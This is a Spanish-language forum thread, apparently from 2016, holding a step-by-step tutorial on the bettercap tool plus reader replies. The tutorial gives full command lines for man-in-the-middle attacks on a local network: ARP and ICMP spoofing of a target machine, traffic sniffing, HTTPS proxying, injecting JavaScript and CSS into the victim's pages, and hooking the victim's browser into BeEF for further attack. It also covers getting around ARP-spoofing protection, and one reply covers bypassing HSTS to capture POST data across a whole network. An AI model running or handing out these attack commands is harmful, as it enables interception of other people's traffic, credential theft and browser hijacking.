[TUTORIAL] "Bettercap el MItM del ahora"

Iniciado por Schmerz, 13 Marzo 2016, 23:59 PM

0 Miembros y 1 Visitante están viendo este tema.

Schmerz

"BETTERCAP EL MITM DEL AHORA"


El dia de hoy presentare una herramienta poco conocida pero que tiene una muy potente utilidad, cabe decir que el titulo se queda corto comparado con lo que se puede hacer, aun asi lo he preferido para dar una idea general.

En el pasado para llevar un MITM (Man-in-the-middle) recurriamos a ettercap, y aunque era efectivo, en algunas ocasiones fallaba y dejaba sin conexion a la persona atacada, por no mencionar el problema que existia interceptando paginas con protocolos https aun utilizando sslstrip.

La pagina oficial de bettercap es la siguiente por si desean obtener mas informacion:
   https://www.bettercap.org
Y aqui esta en github:
   https://github.com/evilsocket/bettercap

Para descargarlo solo basta tipear el comando 'git clone' seguido de la ruta del url mas la extension '.git' en pocas palabras queda asi:

git clone https://github.com/evilsocket/bettercap.git

Una vez descargado tendran que instalarlo, en la pagina de github viene el como hacerlo y que dependencias son necesarias, para la mayoria de usuarios son necesarias  "build-essential", "ruby-dev" y  "libpcap-dev".

Asi que tipeando en la consola:
   sudo apt-get install build-essential ruby-dev libpcap-dev

NOTA: HAGO HINCAPIE QUE REVISEN EL ARCHIVO README.md EN EL ENCONTRARAN INFORMACION DE LA INSTALACION, URLS, ETC...

Una de los apartados mas importantes del framework es el de bettercap-proxy-modules el cual contiene scripts creados en ruby, son muy faciles de entender y poseen acciones interesantes, mas tarde utilizare algunos de estos.

Aqui dejo la direccion de descarga:
   https://github.com/evilsocket/bettercap-proxy-modules.git

--> El primer paso a realizar es poder identificar la maquina a atacar, con un simple comando en nmap, como por ejemplo:
   nmap -f -sP 192.168.1.0/24 ò nmap -f -sP 192.168.1.*

[> Sera suficiente para identificar las maquinas en tu red local utilizando un ping con paquetes ICMP

[> En la mayoria de las distribuciones es necesario ejecutar nmap con permisos root asi que bastara con:
   sudo su
   [Contraseña]

--> En mi caso poseo una maquina virtual corriendo Windows 7 Home Basic en VirtualBox que tiene la ip "192.168.1.70"

--> Es momento de aprovechar el potencial de bettercap, nos dirijimos a la carpeta bettercap, si ya lo tienes trabajando correctamente salta este paso, ejecutamos el comando:

    gem build bettercap.gemspec

Seguido de:

      gem install bettercap*.gem

Y para finalizar:
   
   gem install bettercap

Si corremos bettercap sin argumentos nos encontraremos que realiza un spoofing a toda la red local, conociendo cada peticion de los usarios, esto suena interesante tanto para nosotros como para algun administrador, asi que plantiemos claros objetivos.

         

Por eso es preferible pasarle el parametro '--help' y observar las opciones, iniciare con un ejemplo simple:

   ./bettercap -X -T 192.168.1.70 --interface wlan0 --gateway 192.168.1.254

Explicare cada opcion:
   -X: Habilita el sniffer.
   -T: Establece la maquina a sniffear (Si se omite el target, sniffeara toda la red)
   --interface ò -i: Especifica la interfaz de red, esta puede ser wlan0, eth0, lo, etc...
   --gateway: Esta opcion no es necesaria, podemos ver nuestra puerta de enlace mediante el comando "route -n".

            

Segundo ejemplo:

   ruby bettercap -X -S ICMP -T 192.168.1.70 -i wlan0 -G 192.168.1.254

   -S: Sirve para cargar el modulo del spoofer, por defecto es: ARP, pero he utilizado el ICMP.

Tercer ejemplo:

   ruby bettercap -X -S ICMP -T 192.168.1.70 -i wlan0 -G 192.168.1.254 --proxy --proxy-https

   --proxy: Habilita el proxy http
   --proxy-https: Habilita el proxy https

Si llegase el caso en el cual hubiese alguna proteccion contra ARP spoofing, con la opcion "--half-duplex" la evitariamos ;)

  • Observando cada opcion de bettercap podemos hacer infinidad de comandos, como inhabilitar el spoofing, guardar la informacion en un archivo log, cargar un modulo: js, cs, html, entre otras cosas.


    Ahora usaremos los modulos, con la opcion "--proxy-module" y definiendo la ruta bastara, en otras palabras:
       
       bettercap -X -S ARP --target 192.168.1.70 --interface wlan0 --proxy --proxy-module=/root/bettercap/bettercap-proxy-modules/hack_title.rb

                         

    Y vemos que en efecto funciona el modulo, en la pestaña dice de la pagina dice "¡¡¡HACKED!!! Google", hay mas modulos por utilizar, podria pasarme el resto del escrito utilizando los modulos, pero ya es tarea del lector :).


    Cargando un archivo javascript:

       bettercap -X -S ARP --target 192.168.1.70 --interface wlan0 --proxy --proxy-module injectjs --js-file /root/bettercap/bettercap-proxy-modules/js/cats.js

    Cargando un archivo CSS:

       bettercap -X -S ARP --target 192.168.1.70 --interface wlan0 --proxy --proxy-module injectcss --css-file /root/bettercap/bettercap-proxy-modules/css/background.css

    Recuerden cambiar la ruta del archivo, en mi caso se hubica de esa manera.
       

    Y para concluir me gustaria hacer notar un modulo que permite poner en funcionamiento beef:

       Ponemos en marcha el servicio apache2:
          service apache2 start
       Colocamos el comando bettercap:
          bettercap -X -S ARP --target 192.168.1.70 --interface wlan0 --proxy --proxy-module=/root/bettercap/bettercap-proxy-modules/beefbox.rb
       Nos pedira que coloquemos la ruta de beef-xss, asi que la colocamos:
          /usr/share/beef-xss
       Y esperamos....
       Despues nos dirigimos a la pagina disponible del puerto 3000, colocando en cualquier navegador de tu preferencia la siguiente URL:
       http://localhost:3000/ui/panel   
                

       El Username y el Password es: beef, nos logeamos y esperamos que la victima abra un pagina, cuando lo haga tendremos una sesion online activa en beef, lista para ser atacada.
                
                               
                               

    En otra oportunidad hablare acerca de beef-xss,como podemos a partir de este paso cargar un exploit, ejecutar comandos o talvez adjuntar metasploit con esta misma.

    Es de pensar el hecho del ¿Cómo? un usuario dentro de la red local puede husmear las paginas que visitamos, aun utilizando mecanismos de defensa, de la informacion expuesta, de la manera en la cual puede alguien obtener acceso a nuestra maquina sin necesidad de mandarnos algun archivo '.pdf', 'exe' o cualquier otro, por eso lo mas recomendable es siempre actualizar, mas aun, toda esta informacion puede ser utilizada en cualquier dispositivo telefonico.   

    NOTA FINAL: Cualquier critica o sugerencia son bien recibidas, si tienes alguna idea, utilidad o duda no dudes en comunicarmelo, siempre estare pendiente a los mensajes.

    [> No me hago responsable de cualquier uso indebido.
    [/font]

    Mod: Post corregido, letra excesivamente grande, imágenes de tamaño máximo permitido del foro y si, legalmente eres responsable de los materiales enseñados

bril23

Funciona normal para equipos conectados a un Swith.
"Si yo tuviera 6 horas para cortar un árbol, me pasaría las primeras cuatro afilando mi hacha".

mester

Cita de: Schmerz en 13 Marzo 2016, 23:59 PM
"BETTERCAP EL MITM DEL AHORA"


Despues nos dirigimos a la pagina disponible del protocolo 3000, colocando en cualquier navegador de tu preferencia la siguiente URL:
   http://localhost:3000/ui/panel
Eso no es el protocolo, es el puerto.
Yo realmente prefiero MITMf, te recomiento que la pruebes https://github.com/byt3bl33d3r/MITMf
La instalación l a puedes obtener de la guía que hay en la web de Github.
Justicia es dar a cada uno lo que se merece

FoxDesierto

creo que tengo problemas tumba toda la red cuando ago solo sniffer


./bettrcap -X

e igual tumba el objetivo cuando le pongo el target que raro

sabes a que se devera

Schmerz

Cita de: bril23 en 14 Marzo 2016, 20:14 PM
Funciona normal para equipos conectados a un Swith.

Sere honesto, no he tenido la oportunidad de probarlo,me pareceria genial si hicieras y compartieras tus pruebas.
Gracias por comentar  :).

Schmerz

Cita de: mester en 15 Marzo 2016, 20:43 PM
Eso no es el protocolo, es el puerto.
Yo realmente prefiero MITMf, te recomiento que la pruebes https://github.com/byt3bl33d3r/MITMf
La instalación l a puedes obtener de la guía que hay en la web de Github.


Corregido!!!

Personalmente he probado un par de ocasiones MITMF, es una buena herramienta pero no la he profundizado, no estaria mal un buen dia hablar de esta tool.

Gracias por comentar.
Saludos.
:D

Schmerz

#6
Cita de: FoxDesierto en 15 Marzo 2016, 23:09 PM
creo que tengo problemas tumba toda la red cuando ago solo sniffer


./bettrcap -X

e igual tumba el objetivo cuando le pongo el target que raro

sabes a que se devera


Si no te funciona trata de utilizarla sin el parametro -X, colocando el target con algun otro parametro y me cuentas que tal te fue.

Te comparto este video:

https://bettercap.org/docs/

Gracias por comentar.
:D


didavgar

Para los que les gusta burpsuite, bettercap tiene un módulo para crear un proxy y saltarse hsts y conseguir todo en texto plano. Ejempl:

bettercap --proxy -P POST

Así lo harían a toda la red.

ElInquisidor

Interesante pero nada fuera de lo normal.

turban

muy buena la ayuda  ;-) ;-)

tengo una duda

cuando genero el siguiente comando

Ejemplo:

bettercap -T 192.168.1.22  --proxy -P POST

me aparece un error en DNS

it looks like there's another process listening  on 192.168.1.22:5300, please chose a different port.

mi consulta es como cambio el puerto para probar




saludos y gracias  :silbar: :silbar: :silbar: :silbar: